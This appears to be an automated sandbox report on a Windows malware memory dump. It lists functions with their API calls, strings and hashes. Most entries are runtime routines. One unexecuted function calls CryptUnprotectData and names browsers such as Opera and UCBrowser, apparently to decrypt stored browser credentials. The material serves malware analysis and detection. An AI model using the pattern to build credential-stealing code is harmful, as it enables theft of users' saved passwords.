Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$CreateErrorLast$CloseCopyHandle
String ID:
API String ID: 1748377786-0
Opcode ID: 81cc17c08a024688f206b221c00007134fe85a57fd1ab26aae4e70d7e87357db
Instruction ID: 7fad499b70cc89fb20206d7bc7d336a8abe9e5035c4ad95d7eb75e084765406c
Opcode Fuzzy Hash: 81cc17c08a024688f206b221c00007134fe85a57fd1ab26aae4e70d7e87357db
Instruction Fuzzy Hash: 2331C330E10115BFDB11AAB9ACC18BF76ACAF0D310F002526FE12D7252DBB88E018769

Uniqueness

Uniqueness Score: -1.00%

Function 00432335, Relevance: 4.6, APIs: 3, Instructions: 131COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043233A
_Deallocate.LIBCONCRT ref: 0043242D
Concurrency::cancel_current_task.LIBCPMT ref: 00432482

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Concurrency::cancel_current_taskDeallocateH_prolog
String ID:
API String ID: 2506673365-0
Opcode ID: b77b366253d18af3f7429f69da78a77b15e8df076682f7e168fbfcc7af8117f9
Instruction ID: f90819c7334d4dbb141da4ba3d32bf9e18301db3c4ab6554e4cec01990b464a7
Opcode Fuzzy Hash: b77b366253d18af3f7429f69da78a77b15e8df076682f7e168fbfcc7af8117f9
Instruction Fuzzy Hash: 4941A472A042058FCB18DF6DD5919AEBBE6EB9C310B30842FE455E7350DB78E941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00453434, Relevance: 4.6, APIs: 3, Instructions: 102COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004534C4
_free.LIBCMT ref: 004534DF
_free.LIBCMT ref: 004534EA

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 99c1ffbdb40e6163f5bae100ec78c0baadc85ec7df0dbf07e61d237067fd0c32
Instruction ID: 0ca2e85d83d7137464a7e364c4d47643d51045b7b4f28735d7599d06a953fc83
Opcode Fuzzy Hash: 99c1ffbdb40e6163f5bae100ec78c0baadc85ec7df0dbf07e61d237067fd0c32
Instruction Fuzzy Hash: 60216E3250C2006BDF165E79A8527BB7BA5CF83757F24016FED4497343D53E9E0A8258

Uniqueness

Uniqueness Score: -1.00%

Function 0040A887, Relevance: 4.6, APIs: 3, Instructions: 71COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040A88C
___std_fs_directory_iterator_open@12.LIBCPMT ref: 0040A8F7
___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040A90B

Part of subcall function 0043E05B: FindNextFileW.KERNELBASE(?,?,?,0040A910,?,?,?,?,?,?,?,?,00000000), ref: 0043E064

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileFindH_prologNext___std_fs_directory_iterator_advance@8___std_fs_directory_iterator_open@12
String ID:
API String ID: 3696715561-0
Opcode ID: 0024eca1c789b8c8c8530c128b2dfb999f400feef7e87703f72af6232c69bd0f
Instruction ID: 5be3a91443aea33e90f9dfbab7ee74ef159e7ec3a2604fbbdb18d14032eea266
Opcode Fuzzy Hash: 0024eca1c789b8c8c8530c128b2dfb999f400feef7e87703f72af6232c69bd0f
Instruction Fuzzy Hash: A921D172B10304EBDF24AEA9D941B9A73B4AF09318F00482FF941B61D1D7BC9951876A

Uniqueness

Uniqueness Score: -1.00%

Function 0045F6B5, Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0045F6BE
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0045F72C

Part of subcall function 00459C34: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0045BC6D,?,00000000,00000000), ref: 00459CD6

Part of subcall function 00458230: RtlAllocateHeap.NTDLL(00000000,0043E6C3,00000000,?,0044058B,00000002,00000000,?,?,?,00408EE6,0043E6C3,00000004,00000000,00000000,00000000), ref: 00458262

_free.LIBCMT ref: 0045F71D

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: a6f20d2672015b03350ddb3cdf48012a8af764d8fa549fc8079abefeb1de257f
Instruction ID: c7c848a84ca1ecbbbe54b0703829ec6d80659dbbf86abe7758079540e043e69b
Opcode Fuzzy Hash: a6f20d2672015b03350ddb3cdf48012a8af764d8fa549fc8079abefeb1de257f
Instruction Fuzzy Hash: AC0184626026157B272126B71C89C7F69ADCACAB96714013EFD04D7243FE6CCC0F81BA

Uniqueness

Uniqueness Score: -1.00%

Function 0043CC81, Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32 ref: 0043CCB4
MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,4876E7FF,?,?,00004098,75146490,00000000,?,0043DC24,?,?,0042C002), ref: 0043CCD1
CloseHandle.KERNEL32(?,?,?,00004098,75146490,00000000,?,0043DC24,?,?,0042C002), ref: 0043CCE1

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$CloseCreateHandleMappingView
String ID:
API String ID: 1187395538-0
Opcode ID: 4a4f128266e17230771fc2c9229f9751cd26cb8ac6179fa591a62c189ccf6f9d
Instruction ID: b821ff41bd6cedd2bf9bb03fc4643fe5d3d98248c3188e5be8f24775cbe7b410
Opcode Fuzzy Hash: 4a4f128266e17230771fc2c9229f9751cd26cb8ac6179fa591a62c189ccf6f9d
Instruction Fuzzy Hash: C5116571500B41DED7328B168C84A23BAF8FB9D761F10A52FE4DBB1641E6B89841DF29

Uniqueness

Uniqueness Score: -1.00%

Function 004164A0, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 327COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004164A5

Part of subcall function 0040ADAE: __EH_prolog.LIBCMT ref: 0040ADB3

Part of subcall function 004123B5: _Deallocate.LIBCONCRT ref: 004123CA

Strings

APPDATA, xrefs: 004164B3, 004164CE

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog$Deallocate
String ID: APPDATA
API String ID: 2428181759-4054820676
Opcode ID: ca384dd9fd54e08439c92413bd38a17f1ce55fed0914ad3698887f9263d85072
Instruction ID: 5d3b89199835f83782d5cec4766a84b855eda4301f3caf503d916723ab98ed83
Opcode Fuzzy Hash: ca384dd9fd54e08439c92413bd38a17f1ce55fed0914ad3698887f9263d85072
Instruction Fuzzy Hash: 9ED1D030D04258DBDF24DFA5C990AEDBBB1AF14304F2041AEE059B7282DB785E89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A184, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040A189

Part of subcall function 004090A2: __EH_prolog.LIBCMT ref: 004090A7
Part of subcall function 004090A2: std::exception::exception.LIBCONCRT ref: 00409148

Strings

Unknown exception, xrefs: 0040A1F8

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog$std::exception::exception
String ID: Unknown exception
API String ID: 1037574509-410509341
Opcode ID: 91d0089c790d801b28910749ac15e6b9a5cbf612abc0b6cf75e6c2941f8eaf39
Instruction ID: 86fb27298f69754c573e4bd30f9be9a13443b67d25c3141632aee5a3a0502be2
Opcode Fuzzy Hash: 91d0089c790d801b28910749ac15e6b9a5cbf612abc0b6cf75e6c2941f8eaf39
Instruction Fuzzy Hash: 4B219A72D00304AFCB199FA9E4405EAFBB0FF48304F10C56EE81AAB341D7769A45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0044234B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,00000000,?,?,0043E6D1,00000000,0048355C,?), ref: 004423AB

Strings

\5H, xrefs: 00442351

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: DispatcherExceptionUser
String ID: \5H
API String ID: 6842923-1087440338
Opcode ID: 9cb82ce3fa6137e6c0ba7235b183b357e7e29fb9fcf60e64ddebbe2c8e862f88
Instruction ID: 2914d72e68695275d84b12d3faa9e7117aab0b9b9c24aa1fc92dc1c7bf6b6e3d
Opcode Fuzzy Hash: 9cb82ce3fa6137e6c0ba7235b183b357e7e29fb9fcf60e64ddebbe2c8e862f88
Instruction Fuzzy Hash: 5001F231900218ABD701DF68D980BAEBBB8FF85300F00805AFD45AB391EBB4AD00CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 004090A2, Relevance: 3.1, APIs: 2, Instructions: 72COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004090A7
std::exception::exception.LIBCONCRT ref: 00409148

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prologstd::exception::exception
String ID:
API String ID: 2619619420-0
Opcode ID: f021b9cc798cc2454425f5e77074e6b53353b73abbbebacfbbadd663e9f1c531
Instruction ID: 31617b4f74e4320925cdf653ddd065683413fd0a145b6df8460182523cc58e92
Opcode Fuzzy Hash: f021b9cc798cc2454425f5e77074e6b53353b73abbbebacfbbadd663e9f1c531
Instruction Fuzzy Hash: CB31F671900218DFCF14DFA9C995ADEBBB4FF18314F04842EE405E7241EBB4AA85CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00435146, Relevance: 3.0, APIs: 2, Instructions: 40synchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32 ref: 00435191
CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 0043519E

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Mutex$CreateOpen
String ID:
API String ID: 4030545807-0
Opcode ID: ad6e5ba5eb505f43b96abaf9d267b7f67cf5aab950f6dd6c9c932b84404957d1
Instruction ID: 0ad118b497f756d022d6c1dc44d543fb4a495e7f26a66be785e5516a73ecb4b1
Opcode Fuzzy Hash: ad6e5ba5eb505f43b96abaf9d267b7f67cf5aab950f6dd6c9c932b84404957d1
Instruction Fuzzy Hash: 2CF08111D443C87ADF01ABF94C459FFBFBC5D1A349F00616DE845A3103E5A455458376

Uniqueness

Uniqueness Score: -1.00%

Function 00453393, Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004533DB

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 468fbbbce9b65a9a7ae4cf14111dcd3a08628f1db70a3e9b4c17d5a0f5bacebe
Instruction ID: aace2b924423b1b1d06ab9bebf612dae57df8941793e695e5fcfe6b784d2f65f
Opcode Fuzzy Hash: 468fbbbce9b65a9a7ae4cf14111dcd3a08628f1db70a3e9b4c17d5a0f5bacebe
Instruction Fuzzy Hash: 9CE0A03260A41052E3212A3B7C0526E01915BC13BBB11033FEC10CA6E3DFBC4A1E415F

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC69, Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040AC75

Part of subcall function 0043E05B: FindNextFileW.KERNELBASE(?,?,?,0040A910,?,?,?,?,?,?,?,?,00000000), ref: 0043E064

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040AC87

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ___std_fs_directory_iterator_advance@8$FileFindNext
String ID:
API String ID: 478157137-0
Opcode ID: ed6a9e7bfc312480ec5f987519a887dfa9748e46e4264cc1d58bd08e7147e1ef
Instruction ID: cbba070a59bb7b81f15f5dd1c5fe8607ea10f9b179179987c573709a3554c92e
Opcode Fuzzy Hash: ed6a9e7bfc312480ec5f987519a887dfa9748e46e4264cc1d58bd08e7147e1ef
Instruction Fuzzy Hash: 60E04F31108304ABFB159E13C90596B7B69AEA2394B021036FC05A7691D779EC729A9A

Uniqueness

Uniqueness Score: -1.00%

Function 0043DCC0, Relevance: 3.0, APIs: 2, Instructions: 20fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,?,00000000,?,?,?,0043DFAA,?,0040B54C,00000000,?,?,?,?,0040B54C,?), ref: 0043DCD0
GetLastError.KERNEL32(?,0043DFAA,?,0040B54C,00000000,?), ref: 0043DCE6

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CopyErrorFileLast
String ID:
API String ID: 374144340-0
Opcode ID: 88490dd10f2928ce2d2b40f0857e23b882aadd69a1ac8fe6d2e33755ef136888
Instruction ID: 7652af9533fda9476f4b84c9121b20cbd70f4d9a990ec7aba5ae2b301899f196
Opcode Fuzzy Hash: 88490dd10f2928ce2d2b40f0857e23b882aadd69a1ac8fe6d2e33755ef136888
Instruction Fuzzy Hash: 01E0DF30904148BFDB008BA5EC08B6E7FE8BB04305F148054F84081211DAB4C500C725

Uniqueness

Uniqueness Score: -1.00%

Function 0041B7E3, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 0041B84B

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: ea45a1e5202beb1ee6c036fc267ddbc8f60f629f9af8967d64619cfeadd49a6d
Instruction ID: 2eb282c1e6fb5926919916c7f78d211bd12d6b7294f5cd75622f042b79fa6ebc
Opcode Fuzzy Hash: ea45a1e5202beb1ee6c036fc267ddbc8f60f629f9af8967d64619cfeadd49a6d
Instruction Fuzzy Hash: 5211E372500215BF8B08EFA9D8848CF7BAEEF45750710056EF414DB251E734EA4087E4

Uniqueness

Uniqueness Score: -1.00%

Function 00412E9F, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412EA4

Part of subcall function 0040A947: __EH_prolog.LIBCMT ref: 0040A94C

Part of subcall function 0040AA98: __EH_prolog.LIBCMT ref: 0040AA9D

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 49d92707fb7a8ec17e79b0f2a69c5ddb8226df48c0101c9e66a5aa3386aa0db8
Instruction ID: af71bbb5e80083cc10aca72792a4b493b875617ddd2afe22c6e76e046c7c2df1
Opcode Fuzzy Hash: 49d92707fb7a8ec17e79b0f2a69c5ddb8226df48c0101c9e66a5aa3386aa0db8
Instruction Fuzzy Hash: B321AF71A053149FDB65DFA9C88479ABBF0EF48304F0084AED509E7781D7799904CF66

Uniqueness

Uniqueness Score: -1.00%

Function 0041434F, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 00408FA5

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::exception::exception
String ID:
API String ID: 2807920213-0
Opcode ID: 471688c9bfd8bfcb79b5c931f60a47ad0d04cbdd92c60e0f481ef4ae1f5365d9
Instruction ID: 19ff7d3c4850efa6f2f34fcb911a44b97c0187f446a062b9d541722a3ba9029a
Opcode Fuzzy Hash: 471688c9bfd8bfcb79b5c931f60a47ad0d04cbdd92c60e0f481ef4ae1f5365d9
Instruction Fuzzy Hash: 1BF0F47290461D678B18BBB6E802C9FBB9CDE4036871101BFF95897242EF39E91583DD

Uniqueness

Uniqueness Score: -1.00%

Function 0045F980, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 004575AF: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0045640D,00000001,00000364,00000008,000000FF,?,0044058B,00000002,00000000,?,?), ref: 004575F0

_free.LIBCMT ref: 0045F9EF

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: a5042e8daa7b541b750649d6040ca229d4d75604248fd5f0da61060fb8c10d3b
Instruction ID: 3ba2bd7525b8d0ebdb741fa6576fdf96d298749216020845b8bc4934c02df4ac
Opcode Fuzzy Hash: a5042e8daa7b541b750649d6040ca229d4d75604248fd5f0da61060fb8c10d3b
Instruction Fuzzy Hash: 5C014EB26083166BC3209F69D481A9EFB98EB44371F11023EE945B76C1D7749C08C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A947, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040A94C

Part of subcall function 0040A887: __EH_prolog.LIBCMT ref: 0040A88C
Part of subcall function 0040A887: ___std_fs_directory_iterator_open@12.LIBCPMT ref: 0040A8F7

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog$___std_fs_directory_iterator_open@12
String ID:
API String ID: 1512400408-0
Opcode ID: b07f98646843938d3cf00ca3aab265e196e79307eefddba2477395152f34c85b
Instruction ID: 8697df242b220c75994fe4590df361075ff625122407795ac63c347963d05c3a
Opcode Fuzzy Hash: b07f98646843938d3cf00ca3aab265e196e79307eefddba2477395152f34c85b
Instruction Fuzzy Hash: 700184B1A05705DFCB29DF6D808159EBBF4BF14314F104A2FE496A3381D7749A08CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004575AF, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0045640D,00000001,00000364,00000008,000000FF,?,0044058B,00000002,00000000,?,?), ref: 004575F0

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4d0ae18bbf79d93e48263a7fc51fe193c68be2e925431120a6134a86b91aa0ba
Instruction ID: 834c144f4e76a0143b36537babb95648dd87678d57066d8eabf3a4ac9e0c58b0
Opcode Fuzzy Hash: 4d0ae18bbf79d93e48263a7fc51fe193c68be2e925431120a6134a86b91aa0ba
Instruction Fuzzy Hash: 30F0E031118529BBDB216A73BC0575F3B499F41772B148037EC0496683EE6CDD0986ED

Uniqueness

Uniqueness Score: -1.00%

Function 00458230, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0043E6C3,00000000,?,0044058B,00000002,00000000,?,?,?,00408EE6,0043E6C3,00000004,00000000,00000000,00000000), ref: 00458262

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: cd583beede7770b7d87f1fc94a27924dce370fb9fbb106eedfd9982ea2affe11
Instruction ID: 673a287964893305bc1dfe9fb30b5609e8ff153e76a36af575fd20c8dd790ddd
Opcode Fuzzy Hash: cd583beede7770b7d87f1fc94a27924dce370fb9fbb106eedfd9982ea2affe11
Instruction Fuzzy Hash: AEE0E531144A119BEB2126A36D01B5F3E49AF427A2F1500AFFC84BA293DF5CCC05C6ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040A526, Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__EH_prolog2.LIBCMT ref: 0040A52D

Part of subcall function 0040A184: __EH_prolog.LIBCMT ref: 0040A189

Part of subcall function 0044234B: KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,00000000,?,?,0043E6D1,00000000,0048355C,?), ref: 004423AB

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: DispatcherExceptionH_prologH_prolog2User
String ID:
API String ID: 3749479025-0
Opcode ID: 9db089c7ba1e243aadb9f878c6f3b05267bf75e716d52c5714b84bae339f07d7
Instruction ID: 79389ca28c8b7e9111b241faf1d39f31dcca043a787dcdbfa2a896a0a91b3338
Opcode Fuzzy Hash: 9db089c7ba1e243aadb9f878c6f3b05267bf75e716d52c5714b84bae339f07d7
Instruction Fuzzy Hash: C5F08271800118BACF10EBA1CC4AFDEB738AF05704F04809DB50477091EF386908CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADAE, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040ADB3

Part of subcall function 00412E9F: __EH_prolog.LIBCMT ref: 00412EA4

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 36118e793525bc201000e387823610fbaa0abacd2313525039a906a7f7265381
Instruction ID: d31a8d083f0ef9d80c79d5bcc9c029ef1f530899776b793287a377fa548a29c8
Opcode Fuzzy Hash: 36118e793525bc201000e387823610fbaa0abacd2313525039a906a7f7265381
Instruction Fuzzy Hash: 2AE0EDB1A10325ABCB14EFB9C80168E77E9EF59718B10853FA445E3740EB78DA508799

Uniqueness

Uniqueness Score: -1.00%

Function 0043E4D2, Relevance: 1.5, APIs: 1, Instructions: 19windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNELBASE(00001300,00000000,?,00000000,?,00000000,00000000), ref: 0043E4E8

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 250bbd263dc381b6950d61642d6f6efe44dc2edf631bd20e056fbaf887f11fc1
Instruction ID: d1720d3ecd7d17dfa8207367f26c86b508a943c8b207ce8a44122572804f5479
Opcode Fuzzy Hash: 250bbd263dc381b6950d61642d6f6efe44dc2edf631bd20e056fbaf887f11fc1
Instruction Fuzzy Hash: 20D0C9B2501118BFFA012BD69C05CF7BB9CEF1D7B1B018022FE44CA450D5725D5097B5

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA64, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

___std_fs_set_current_path@4.LIBCPMT ref: 0041BA72

Part of subcall function 0040A526: __EH_prolog2.LIBCMT ref: 0040A52D

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog2___std_fs_set_current_path@4
String ID:
API String ID: 2482923176-0
Opcode ID: 08056c31b6eca38c0ade24e118347c6ad08cc08f08c58bbddeb0c9bf26f80cca
Instruction ID: a9255e1a8472d8d056c416c604f9f731369028cdb5976a620d5d59a360b24a5b
Opcode Fuzzy Hash: 08056c31b6eca38c0ade24e118347c6ad08cc08f08c58bbddeb0c9bf26f80cca
Instruction Fuzzy Hash: B1C01231615220938A24A96EAD088D351DD9F4E34D710482FBD40D3610D678DC8147E8

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040E99E, Relevance: 56.8, APIs: 14, Strings: 18, Instructions: 847libraryloaderencryptionCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040E9A3
GetProcAddress.KERNEL32(?,?), ref: 0040E9EF
GetProcAddress.KERNEL32(?,?), ref: 0040EA1F
GetProcAddress.KERNEL32(?,?), ref: 0040EA65
GetProcAddress.KERNEL32(?,?), ref: 0040EA9B
GetProcAddress.KERNEL32(?,?), ref: 0040EACE
GetProcAddress.KERNEL32(?,?), ref: 0040EB01
GetProcAddress.KERNEL32(?,?), ref: 0040EB30
GetProcAddress.KERNEL32(?,?), ref: 0040EB70
wsprintfA.USER32 ref: 0040EBEA

Part of subcall function 004123B5: _Deallocate.LIBCONCRT ref: 004123CA

Part of subcall function 00412593: _Deallocate.LIBCONCRT ref: 004125A2

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040F299
LocalFree.KERNEL32(?,?,?), ref: 0040F2FE
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040F386
LocalFree.KERNEL32(?), ref: 0040F3D0

Strings

Opera, xrefs: 0040EF46
j|, xrefs: 0040EB50
m, xrefs: 0040F53D
360Browser, xrefs: 0040ED38
ABJD, xrefs: 0040ED89
XHk, xrefs: 0040ED59
e6*#1_E, xrefs: 0040F518
epet, xrefs: 0040F0B5
31<p, xrefs: 0040EFC0
<!, xrefs: 0040EDD2
v10, xrefs: 0040EEE9
E, xrefs: 0040F560
"},, xrefs: 0040F192
G46+.3"t, xrefs: 0040EA58
UCBrowser, xrefs: 0040ED23
Kb&j|#m, xrefs: 0040F554, 0040F080, 0040EF8E
Fzuv, xrefs: 0040EB49
pm|*, xrefs: 0040EB42

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$CryptDataDeallocateFreeLocalUnprotect$H_prologwsprintf
String ID: "},$31<p$360Browser$<!$ABJD$E$Fzuv$G46+.3"t$Kb&j|#m$Opera$UCBrowser$XHk$e6*#1_E$epet$j|$m$pm|*$v10
API String ID: 2618467385-3730986780
Opcode ID: 25da6b44895d8bebcef462aae422a6ce112655e9e8678d861a5789cc1dc828f5
Instruction ID: ecefc789211ae49c3f5cbc3aaca7d98ac032f5642d3965da6a996a15b619d74e
Opcode Fuzzy Hash: 25da6b44895d8bebcef462aae422a6ce112655e9e8678d861a5789cc1dc828f5
Instruction Fuzzy Hash: C072BD30D00258DADF21DFA5CD91AEEBBB5BF19304F1040BEE409B7292DB745A89CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040CEA6, Relevance: 42.7, APIs: 11, Strings: 13, Instructions: 729libraryloaderencryptionCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040CEAB
GetProcAddress.KERNEL32(?,?), ref: 0040CEF4
GetProcAddress.KERNEL32(?,?), ref: 0040CF24
